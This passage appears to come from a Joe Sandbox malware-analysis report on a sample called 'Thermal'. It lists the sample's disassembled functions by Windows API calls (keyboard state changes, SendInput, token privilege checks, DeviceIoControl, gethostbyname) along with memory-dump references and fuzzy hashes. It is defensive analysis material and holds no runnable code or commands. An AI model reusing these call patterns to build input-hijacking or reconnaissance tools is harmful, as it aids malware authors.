                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00181342
                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001813A8
                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 001813FA
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: cff2927118826f5a75c01a232ce8ca4da6a73d6cc7463ca1eebcd9030cca13c6
                                                      • Instruction ID: 925b51498d4608b9408339a120acd9d980be65ba1adb9613d964989f58d1c450
                                                      • Opcode Fuzzy Hash: cff2927118826f5a75c01a232ce8ca4da6a73d6cc7463ca1eebcd9030cca13c6
                                                      • Instruction Fuzzy Hash: 13313B32940608BEFB35A6258C057FE7BAEBB49330F04431AE89152AD1D3748F869F51
                                                      APIs
                                                      • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00181465
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00181481
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 001814E0
                                                      • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00181532
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 69223195abe09c10cffe21fba3096f4eb47deb2ce753f2226dcd2af679a4e46e
                                                      • Instruction ID: df054aed776d947b22218350dbf1e632ac097bf458996c1f07f7e80a14cddb3d
                                                      • Opcode Fuzzy Hash: 69223195abe09c10cffe21fba3096f4eb47deb2ce753f2226dcd2af679a4e46e
                                                      • Instruction Fuzzy Hash: B2316C329402087EFF35AB658C04BFABBADAB89320F48431AE481525D1C3748F878F61
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0015642B
                                                      • __isleadbyte_l.LIBCMT ref: 00156459
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00156487
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001564BD
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 787be7111ef3261c3e659cd9a41537ed8921bfd677b3caedc07dccd1189cf874
                                                      • Instruction ID: fe5c5ac924ab9c6e188a6163b92dfa9653b3cc6e369481f488aecb99d0e39e21
                                                      • Opcode Fuzzy Hash: 787be7111ef3261c3e659cd9a41537ed8921bfd677b3caedc07dccd1189cf874
                                                      • Instruction Fuzzy Hash: 9631D031600296EFDB258F65CC44BAB7BA5FF40322F554128FC748B1A0EB31E854DB90
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 001A553F
                                                        • Part of subcall function 00183B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00183B4E
                                                        • Part of subcall function 00183B34: GetCurrentThreadId.KERNEL32 ref: 00183B55
                                                        • Part of subcall function 00183B34: AttachThreadInput.USER32(00000000,?,001855C0), ref: 00183B5C
                                                      • GetCaretPos.USER32(?), ref: 001A5550
                                                      • ClientToScreen.USER32(00000000,?), ref: 001A558B
                                                      • GetForegroundWindow.USER32 ref: 001A5591
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: 8b120c60617544cf95be05d07356de13db783e3c543be5bcc64e3bd630671f8a
                                                      • Instruction ID: 7b12db0fbbb37d633545d06454e05957bc1b6e0220a37ac5a7c410d455617acf
                                                      • Opcode Fuzzy Hash: 8b120c60617544cf95be05d07356de13db783e3c543be5bcc64e3bd630671f8a
                                                      • Instruction Fuzzy Hash: C9312D71900118AFDB00EFA5D8859EFB7F9EFA8304F10406AE915E7241EB71AE518FA0
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • GetCursorPos.USER32(?), ref: 001ACB7A
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0015BCEC,?,?,?,?,?), ref: 001ACB8F
                                                      • GetCursorPos.USER32(?), ref: 001ACBDC
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0015BCEC,?,?,?), ref: 001ACC16
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: 38d9b09270277612fe60bd0aaef8fdba9f385033bf933b4f61462499b0edd301
                                                      • Instruction ID: c1fe198cc34cc72e37d7dc9331da407fe256431566139d7f309efac86b74fee7
                                                      • Opcode Fuzzy Hash: 38d9b09270277612fe60bd0aaef8fdba9f385033bf933b4f61462499b0edd301
                                                      • Instruction Fuzzy Hash: 2E31D238600158AFCB258F58CC89EFE7BB5EB4A350F044099F9059B661C3329D91EFE0
                                                      APIs
                                                      • __setmode.LIBCMT ref: 00140BE2
                                                        • Part of subcall function 0013402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00187E51,?,?,00000000), ref: 00134041
                                                        • Part of subcall function 0013402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00187E51,?,?,00000000,?,?), ref: 00134065
                                                      • _fprintf.LIBCMT ref: 00140C19
                                                      • OutputDebugStringW.KERNEL32(?), ref: 0017694C
                                                        • Part of subcall function 00144CCA: _flsall.LIBCMT ref: 00144CE3
                                                      • __setmode.LIBCMT ref: 00140C4E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                      • String ID:
                                                      • API String ID: 521402451-0
                                                      • Opcode ID: 6f5aebb4480de76c8f2650991ad891228f21eb77c0ef9d1cc4fa366fb49e872c
                                                      • Instruction ID: 2541fb67b8f85befd7b767c3f0b136e36dfbc380b0d21995904d20ec12f1c1a6
                                                      • Opcode Fuzzy Hash: 6f5aebb4480de76c8f2650991ad891228f21eb77c0ef9d1cc4fa366fb49e872c
                                                      • Instruction Fuzzy Hash: C9115472904208AFDB08B7A4AC83AFEBB28DF65320F104159F204671E2DF311D4297A0
                                                      APIs
                                                        • Part of subcall function 00178D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00178D3F
                                                        • Part of subcall function 00178D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00178D49
                                                        • Part of subcall function 00178D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D58
                                                        • Part of subcall function 00178D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D5F
                                                        • Part of subcall function 00178D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D75
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001792C1
                                                      • _memcmp.LIBCMT ref: 001792E4
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0017931A
                                                      • HeapFree.KERNEL32(00000000), ref: 00179321
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      • Opcode ID: e15c75a4dee33d989c753334eae4f8d3e62dea76ebd42255281cec62ec46d6c5
                                                      • Instruction ID: b22c3677bcf4e700908c97f3deb6c3e3c98ed936f2ad85aee8ffa23bc061c05e
                                                      • Opcode Fuzzy Hash: e15c75a4dee33d989c753334eae4f8d3e62dea76ebd42255281cec62ec46d6c5
                                                      • Instruction Fuzzy Hash: 6621B071E40108EFDB10DFA4C945BEEB7B8FF44301F048059E848A7291D774AE48CB90
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 001A63BD
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001A63D7
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001A63E5
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001A63F3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      • Opcode ID: a2591f5173a478c97fe640a4c30d4625afc1d3843c03c141d4fb3821bb6525c3
                                                      • Instruction ID: 827580048d4ec3b6ad10277f6c3d109a612dc580c001b67e93f5bd6fbf7aa2be
                                                      • Opcode Fuzzy Hash: a2591f5173a478c97fe640a4c30d4625afc1d3843c03c141d4fb3821bb6525c3
                                                      • Instruction Fuzzy Hash: 22110335300428AFDB05AB24DC55FBA77A9FF56320F184218F81ACB2D1CB70AC01CB94
                                                      APIs
                                                        • Part of subcall function 0017F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0017E46F,?,?,?,0017F262,00000000,000000EF,00000119,?,?), ref: 0017F867
                                                        • Part of subcall function 0017F858: lstrcpyW.KERNEL32(00000000,?,?,0017E46F,?,?,?,0017F262,00000000,000000EF,00000119,?,?,00000000), ref: 0017F88D
                                                        • Part of subcall function 0017F858: lstrcmpiW.KERNEL32(00000000,?,0017E46F,?,?,?,0017F262,00000000,000000EF,00000119,?,?), ref: 0017F8BE
                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0017F262,00000000,000000EF,00000119,?,?,00000000), ref: 0017E488
                                                      • lstrcpyW.KERNEL32(00000000,?,?,0017F262,00000000,000000EF,00000119,?,?,00000000), ref: 0017E4AE
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0017F262,00000000,000000EF,00000119,?,?,00000000), ref: 0017E4E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      • Opcode ID: 935715045afa6ce9ffc41586edb2330223db7dacc4cd16d1a61453dba6150fe9
                                                      • Instruction ID: cc4ab02a66d2d292be9c8902cdc080324a0f94bdb9fd0dbe539a4bc7a0738319
                                                      • Opcode Fuzzy Hash: 935715045afa6ce9ffc41586edb2330223db7dacc4cd16d1a61453dba6150fe9
                                                      • Instruction Fuzzy Hash: 1F118E3A200345AFDB25AF34D849D7A77F9FF49350B40816AF90ACB2A0EB71D991C791
                                                      APIs
                                                      • _free.LIBCMT ref: 00155331
                                                        • Part of subcall function 0014593C: __FF_MSGBANNER.LIBCMT ref: 00145953
                                                        • Part of subcall function 0014593C: __NMSG_WRITE.LIBCMT ref: 0014595A
                                                        • Part of subcall function 0014593C: RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,?,00000004,?,?,00141003,?), ref: 0014597F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: a08b7e29caf8e3c87e348f86c219f7a04e31e2b97c255eb6bebaf11ad985be45
                                                      • Instruction ID: ea165ff1bcd55b36ae5f11ba7b7b407663867275085f71a8ca1c4c57c0e8f0a9
                                                      • Opcode Fuzzy Hash: a08b7e29caf8e3c87e348f86c219f7a04e31e2b97c255eb6bebaf11ad985be45
                                                      • Instruction Fuzzy Hash: D0112B31806A15EFCB653FB0AC5465E37967F243E2B104925FC2C9E1B1DF7089849750
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00184385
                                                      • _memset.LIBCMT ref: 001843A6
                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001843F8
                                                      • CloseHandle.KERNEL32(00000000), ref: 00184401
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                      • String ID:
                                                      • API String ID: 1157408455-0
                                                      • Opcode ID: 5e1be35cbcd40fbcc5805ca95d1ad31fe67421fee1abd0309e44aa36b0786b3b
                                                      • Instruction ID: 9ea39a60a5fe7e1c9808e2b07f4280af08b28cc630c3b553a6e98721e1a966ef
                                                      • Opcode Fuzzy Hash: 5e1be35cbcd40fbcc5805ca95d1ad31fe67421fee1abd0309e44aa36b0786b3b
                                                      • Instruction Fuzzy Hash: 1411A7759012287AD7309BA5AC4DFABBB7CEF45760F10469AF908E7190D7744F808BA4
                                                      APIs
                                                        • Part of subcall function 0013402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00187E51,?,?,00000000), ref: 00134041
                                                        • Part of subcall function 0013402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00187E51,?,?,00000000,?,?), ref: 00134065
                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00196A84
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00196A8F
                                                      • _memmove.LIBCMT ref: 00196ABC
                                                      • inet_ntoa.WSOCK32(?), ref: 00196AC7
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 1504782959-0
                                                      • Opcode ID: e242be07a6bd1f3c50a1dca0151384f361acebb05e5cdc91255e9aa608ef10e5
                                                      • Instruction ID: 5b7cd0e986261d23eaa307796f5a4ebc1e1d335bb8b80bb29647a24517ac9308
                                                      • Opcode Fuzzy Hash: e242be07a6bd1f3c50a1dca0151384f361acebb05e5cdc91255e9aa608ef10e5
                                                      • Instruction Fuzzy Hash: 37116375900108AFCF05EBA4DD46CEEB7B8EF28310B144165F506A72A1DF30AE50DBA1
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 001216B4
                                                      • GetClientRect.USER32(?,?), ref: 0015B93C
                                                      • GetCursorPos.USER32(?), ref: 0015B946
                                                      • ScreenToClient.USER32(?,?), ref: 0015B951
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                      • String ID:
                                                      • API String ID: 4127811313-0
                                                      • Opcode ID: a51dd43d68a88b51c2b1b68e48dd230f47e3c7699b7d7b7d365d4be38738ed14
                                                      • Instruction ID: ff2ae1dc9332c85693a6873028335a07ee169e821edf92adc649fb9b85d07319
                                                      • Opcode Fuzzy Hash: a51dd43d68a88b51c2b1b68e48dd230f47e3c7699b7d7b7d365d4be38738ed14
                                                      • Instruction Fuzzy Hash: 69114335A00129FBCB10EF98E889DFE77BAEB28300F000556E901E7540C370BAA1CBA1
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00179719
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0017972B
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00179741
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0017975C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: f3e9f6a434630b31845e84b43d3102bb43402295e3c580182fb8f8878d76d032
                                                      • Instruction ID: a496c7e43ec437f0417c41a46df8c752bb1197a131c8ee01165b228c56c6e837
                                                      • Opcode Fuzzy Hash: f3e9f6a434630b31845e84b43d3102bb43402295e3c580182fb8f8878d76d032
                                                      • Instruction Fuzzy Hash: 2A114879900218FFEB11DF95C985E9DBBB8FB48710F204091E904B7290D7716E10DB90
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0012214F
                                                      • GetStockObject.GDI32(00000011), ref: 00122163
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0012216D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CreateMessageObjectSendStockWindow
                                                      • String ID:
                                                      • API String ID: 3970641297-0
                                                      • Opcode ID: 5a36c025b9d90af1e2888c8954e1cdb905731249dd5399780d1cf6ecd6e1e891
                                                      • Instruction ID: 612223f9c11a20f7fb68f2fa064e1406b31a5e472901ed823416a83746b18ef3
                                                      • Opcode Fuzzy Hash: 5a36c025b9d90af1e2888c8954e1cdb905731249dd5399780d1cf6ecd6e1e891
                                                      • Instruction Fuzzy Hash: B111AD72101259BFEF064F90AC84EEFBB69EF59394F050202FA0456010CB31DCB1DBA0
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001804EC,?,0018153F,?,00008000), ref: 0018195E
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,001804EC,?,0018153F,?,00008000), ref: 00181983
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001804EC,?,0018153F,?,00008000), ref: 0018198D
                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,001804EC,?,0018153F,?,00008000), ref: 001819C0
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
